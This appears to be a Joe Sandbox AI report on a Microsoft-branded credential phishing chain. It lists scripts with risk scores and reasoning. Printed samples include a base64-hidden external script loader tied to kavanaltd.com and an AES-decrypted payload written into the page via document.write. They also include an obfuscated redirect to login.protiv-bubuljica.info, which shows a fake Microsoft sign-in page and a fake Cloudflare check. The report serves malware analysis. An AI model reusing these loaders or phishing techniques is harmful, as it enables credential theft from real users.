| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High risk due to multiple concerning factors: 1) Uses base64 obfuscation to hide URL (3 points), 2) Dynamically injects external script into document head (3 points), 3) Suspicious domain 'kavanaltd.com' not associated with legitimate services (2 points). The presence of an email placeholder suggests potential data collection/exfiltration capabilities in the loaded script."
} |
var payd = "%EMAIL%";
document.head.append(Object.assign(document.createElement("script"), {src: atob("aHR0cHM6Ly9rYXZhbmFsdGQuY29tL25ld3MvaW5kZXgucGhw")}));
|
| URL: :// Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: :// |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is a legitimate implementation of Cloudflare's Turnstile CAPTCHA system. It uses a standard configuration pattern with a valid sitekey format, callback functions for verification and expiration, and runs within the expected window.onload context. No suspicious behaviors or data exfiltration patterns are present."
} |
window.onloadTurnstileCallback = function () {
turnstile.render("#turnstileCaptcha", {
sitekey: "0x4AAAAAAA1E-km6p2OSxRUM",
callback: verifyCallback_CF,
"expired-callback": refreshCallBack,
// "error-callback": switchToSecondCaptcha(),
})
}
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High-risk script that loads crypto-js library and performs suspicious encryption operations. It uses document.write() with decrypted content, which could inject malicious code. The use of Base64 encoding and AES encryption to obscure the actual payload is a common malware technique. The script appears to be deliberately obfuscated with random variable names."
} |
var KCKCPkBUrR = document.createElement("script");
KCKCPkBUrR.setAttribute("src", "https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js");
document.head.append(KCKCPkBUrR);
KCKCPkBUrR.onload = function() {
const sSPCONpBtJ = CryptoJS.enc.Base64.parse("ER3YxrNKnGMEfT2nbMt/W9h2ymCd0xcaaubjIVA+z28C9drn6jfKp/nLa2Tc+X5TTrzRKZP5rWyyHG3p4aemNQKsGszFGmEF1RzV2ryeZQwuBIdV5uZ+sUYwLSgLknQxFB4apfcAkUFC+1p9PHclkvoWT9eYSwoXrFdNrObuvFF8DzjS+qFyZ28lRuJO1Wlr9er+JZ1VHCOTkdel9BA4TQTclXg4aILIPVwWw9U759LS5kLjzbSIZoi8SEhAxIAnY3kAViXr2tUMLIFqUoq78SoQIDMsoPMJH7jbk0FkqExO/x0ep5amZh79oNcMF5UY");
const iCxvvXgAEz = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(0, 4));
const VQGkYtxNuP = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(4, 8));
const boqYZyIQln = CryptoJS.lib.WordArray.create(sSPCONpBtJ.words.slice(8));
const BoetwppTXx = CryptoJS.PBKDF2("uzTvAiTWBoGECqGxawiNKQcmXWYacTkJ", iCxvvXgAEz, {
keySize: 256 / 32,
iterations: 1000
});
const qyfZVmWZoL = CryptoJS.AES.decrypt({ ciphertext: boqYZyIQln }, BoetwppTXx, {
iv: VQGkYtxNuP
});
document.write(qyfZVmWZoL.toString(CryptoJS.enc.Utf8));
};
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "Script shows high-risk behavior with obfuscated URL construction (splitting 'https' into individual characters) and uses window.location.assign for redirection. The incomplete URL string and obfuscation technique are common in malicious scripts attempting to bypass security filters. The use of a callback function named 'verifyCallback_CF' suggests potential manipulation of verification processes."
} |
var verifyCallback_CF = function (response) {
console.log("verified");
window.location.assign('h' + 't' + 't' + 'ps
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The script performs basic DOM manipulation to switch between CAPTCHA forms and includes a refresh callback. It uses standard DOM methods, setTimeout for timing, and basic visibility toggles. No data exfiltration, suspicious domains, or malicious patterns detected. The behavior is consistent with legitimate CAPTCHA implementation practices."
} |
window.switchToSecondCaptcha = function () {
console.log("CAPTCHA switch callback activated")
let gForm = document.querySelector("#gForm")
if (validateElement(gForm) || gForm.style == "visible") {
return
}
setTimeout(function () {
const cfForm = document.querySelector("#cfForm")
if (validateElement(cfForm) && cfForm.style.visibility != "hidden") {
cfForm.remove()
}
setTimeout(function () {
gForm.style.visibility = "visible"
}, 200)
}, 200)
}
var refreshCallBack = function (response) {
console.log("Refresh callback activated")
setTimeout(function () {
window.location.reload()
}, 1000)
}
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate implementation of the CryptoJS library. It contains standard cryptographic operations and uses native crypto modules when available. The code is not obfuscated and follows proper module export patterns. The only minor risk factors are the use of eval-like patterns in module definition (define/AMD) and dynamic property access, but these are standard practices for this type of library."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var W,O,I,U,K,X,L,l,j,T,t,N,q,e,Z,V,G,J,Q,Y,$,t1,e1,r1,i1,o1,n1,s,s1,c1,a1,h1,l1,o,f1,r,d1,u1,n,c,a,h,f,d,i=function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},o=t.lib={},n=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=o.WordArray=n.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,o=t.sigBytes;if(this.clamp(),i%4)for(var n=0;n<o;n++){var s=r[n>>>2]>>>24-n%4*8&255;e[i+n>>>2]|=s<<24-(i+n)%4*8}else for(var c=0;c<o;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=o,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=n.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],o=0;o<r;o++){var n=e[o>>>2]>>>24-o%4*8&255;i.push((n>>>4).toString(16)),i.push((15&n).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],o=0;o<r;o++){var n=e[o>>>2]>>>24-o%4*8&255;i.push(String.fromCharCode(n))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=o.BufferedBlockAlgorithm=n.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,o=r.sigBytes,n=this.blockSize,s=o/(4*n),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*n,t=h.min(4*c,o);if(c){for(var a=0;a<c;a+=n)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=t}return new l.init(e,t)},clone:function(){var t=n.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(o.Hasher=d.extend({cfg:n.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function( |
| URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script that exhibits multiple suspicious behaviors: 1) Uses string concatenation to obfuscate a URL (+3 points), 2) Redirects to a suspicious domain with unusual TLD (.info) and suspicious subdomain structure (+3 points), 3) Contains random-looking query parameters suggesting potential malicious intent (+2 points), 4) Domain appears designed to mimic legitimate services (+1 point). Pattern matches common phishing redirect techniques."
} |
var verifyCallback_CF = function (response) {
console.log("verified");
window.location.assign('h' + 't' + 't' + 'ps:' + '//l' + 'og' + 'in' + '.' + 'pro' + 't' + 'iv-' + 'b' + 'ubu' + 'lji' + 'ca.' + 'in' + 'fo' + '/' + 'HaN' + 'k' + 'gGI' + 'Y' + '?n' + '=2d' + 'V0' + 'i' + 'Qc');
};
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The script appears to be a legitimate loader/spinner implementation with captcha form switching functionality. It only performs DOM manipulation using standard querySelector methods and visibility changes. The timeouts and intervals are used for a loading animation effect. No external data transmission, suspicious domains, or potentially harmful operations are present. The code follows common UI/UX patterns for handling loading states and form visibility."
} |
var incrementLoader = function () {
const waitp = document.querySelector("#cf-spinner-please-wait")
const gForm = document.querySelector("#gForm")
if (validateElement(gForm) && gForm.style.visibility == "hidden") {
waitp.textContent += "."
}
}
setTimeout(() => {
let i = 0
ticker = setInterval(function () {
i += 1
incrementLoader()
if (i > 3) {
clearInterval(ticker)
return
}
}, 1000)
}, 500)
setTimeout(function () {
const cfForm = document.querySelector("#cfForm")
if (!validateElement(cfForm)) {
switchToSecondCaptcha()
return
}
const gForm = document.querySelector("#gForm")
if (!validateElement(gForm)) {
// nothing to switch to
return
}
if (cfForm.style.visibility == "visible" || gForm.style.visibility != "visible") {
switchToSecondCaptcha()
}
}, 7000)
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "Script performs basic URL parsing and local storage operations. While it stores email from URL fragment which could be a minor security concern (potentially part of a tracking system), it uses standard browser APIs and doesn't transmit data externally. No malicious patterns detected, though storing PII (email) in localStorage without encryption is a suboptimal practice."
} |
var aemail = "";
console.log(window.location.href.split('#'));
if(window.location.hash) {
const myArr = window.location.hash.split("#");
aemail = myArr[1];
}
console.log(aemail)
localStorage.setItem('email', aemail);
localStorage.setItem('everthingood', "true");
const cat = localStorage.getItem('email');
console.log(cat)
|
| URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.protiv-bubuljica.info Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://login.protiv-bubuljica.info |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Promise polyfill implementation from hCaptcha (as indicated by the license comment). It implements standard Promise functionality and fallbacks, using only standard JavaScript features. No suspicious behaviors like eval(), external data transmission, or DOM manipulation are present. The code is not obfuscated and comes from a trusted source."
} |
/* https://hcaptcha.com/license */
!function(){"use strict";function t(t){var e=this.constructor;return this.then((function(i){return e.resolve(t()).then((function(){return i}))}),(function(i){return e.resolve(t()).then((function(){return e.reject(i)}))}))}function e(t){return new this((function(e,i){if(!t||"undefined"==typeof t.length)return i(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var n=Array.prototype.slice.call(t);if(0===n.length)return e([]);var r=n.length;function o(t,i){if(i&&("object"==typeof i||"function"==typeof i)){var s=i.then;if("function"==typeof s)return void s.call(i,(function(e){o(t,e)}),(function(i){n[t]={status:"rejected",reason:i},0==--r&&e(n)}))}n[t]={status:"fulfilled",value:i},0==--r&&e(n)}for(var s=0;s<n.length;s++)o(s,n[s])}))}var i=setTimeout,n="undefined"!=typeof setImmediate?setImmediate:null;function r(t){return Boolean(t&&"undefined"!=typeof t.length)}function o(){}function s(t){if(!(this instanceof s))throw new TypeError("Promises must be constructed via new");if("function"!=typeof t)throw new TypeError("not a function");this._state=0,this._handled=!1,this._value=undefined,this._deferreds=[],f(t,this)}function a(t,e){for(;3===t._state;)t=t._value;0!==t._state?(t._handled=!0,s._immediateFn((function(){var i=1===t._state?e.onFulfilled:e.onRejected;if(null!==i){var n;try{n=i(t._value)}catch(r){return void c(e.promise,r)}l(e.promise,n)}else(1===t._state?l:c)(e.promise,t._value)}))):t._deferreds.push(e)}function l(t,e){try{if(e===t)throw new TypeError("A promise cannot be resolved with itself.");if(e&&("object"==typeof e||"function"==typeof e)){var i=e.then;if(e instanceof s)return t._state=3,t._value=e,void h(t);if("function"==typeof i)return void f((n=i,r=e,function(){n.apply(r,arguments)}),t)}t._state=1,t._value=e,h(t)}catch(o){c(t,o)}var n,r}function c(t,e){t._state=2,t._value=e,h(t)}function h(t){2===t._state&&0===t._deferreds.length&&s._immediateFn((function(){t._handled||s._unhandledRejectionFn(t._value)}));for(var e=0,i=t._deferreds.length;e<i;e++)a(t,t._deferreds[e]);t._deferreds=null}function u(t,e,i){this.onFulfilled="function"==typeof t?t:null,this.onRejected="function"==typeof e?e:null,this.promise=i}function f(t,e){var i=!1;try{t((function(t){i||(i=!0,l(e,t))}),(function(t){i||(i=!0,c(e,t))}))}catch(n){if(i)return;i=!0,c(e,n)}}s.prototype["catch"]=function(t){return this.then(null,t)},s.prototype.then=function(t,e){var i=new this.constructor(o);return a(this,new u(t,e,i)),i},s.prototype["finally"]=t,s.all=function(t){return new s((function(e,i){if(!r(t))return i(new TypeError("Promise.all accepts an array"));var n=Array.prototype.slice.call(t);if(0===n.length)return e([]);var o=n.length;function s(t,r){try{if(r&&("object"==typeof r||"function"==typeof r)){var a=r.then;if("function"==typeof a)return void a.call(r,(function(e){s(t,e)}),i)}n[t]=r,0==--o&&e(n)}catch(l){i(l)}}for(var a=0;a<n.length;a++)s(a,n[a])}))},s.allSettled=e,s.resolve=function(t){return t&&"object"==typeof t&&t.constructor===s?t:new s((function(e){e(t)}))},s.reject=function(t){return new s((function(e,i){i(t)}))},s.race=function(t){return new s((function(e,i){if(!r(t))return i(new TypeError("Promise.race accepts an array"));for(var n=0,o=t.length;n<o;n++)s.resolve(t[n]).then(e,i)}))},s._immediateFn="function"==typeof n&&function(t){n(t)}||function(t){i(t,0)},s._unhandledRejectionFn=function(t){"undefined"!=typeof console&&console&&console.warn("Possible Unhandled Promise Rejection:",t)};var d=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();function p(t,e,i){return e<=t&&t<=i}function y(t){if(t===undefined)return{};if(t===Object(t))return t;throw TypeError("Could not convert argument to dictionary")}"function"!=typeof d.Promise?d.Promise=s:(d.Promise.prototype["finally"]||(d.Promise.prototype["finally"]=t),d.Promise.allSettled| |
| URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Please stand by, while we are checking if the site connection is secure",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://login.protiv-bubuljica.info/HaNkgGIY# Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
 |
| URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Trying to sign you in",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2% Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.protiv-bubuljica.info' does not match the legitimate domain for Microsoft.", "The domain 'protiv-bubuljica.info' is unrelated to Microsoft and appears suspicious.", "The use of a non-Microsoft domain with Microsoft branding is a common phishing tactic.", "The presence of input fields for 'Email, phone, or Skype' suggests an attempt to collect sensitive information under the guise of Microsoft." ], "riskscore": 9}
Google indexed: False |
URL: login.protiv-bubuljica.info
Brands: Microsoft
Input Fields: Email, phone, or Skype |
| URL: https://protiv-bubuljica.info Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://protiv-bubuljica.info |
Edit tour
chrome.exe (PID: 1508 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node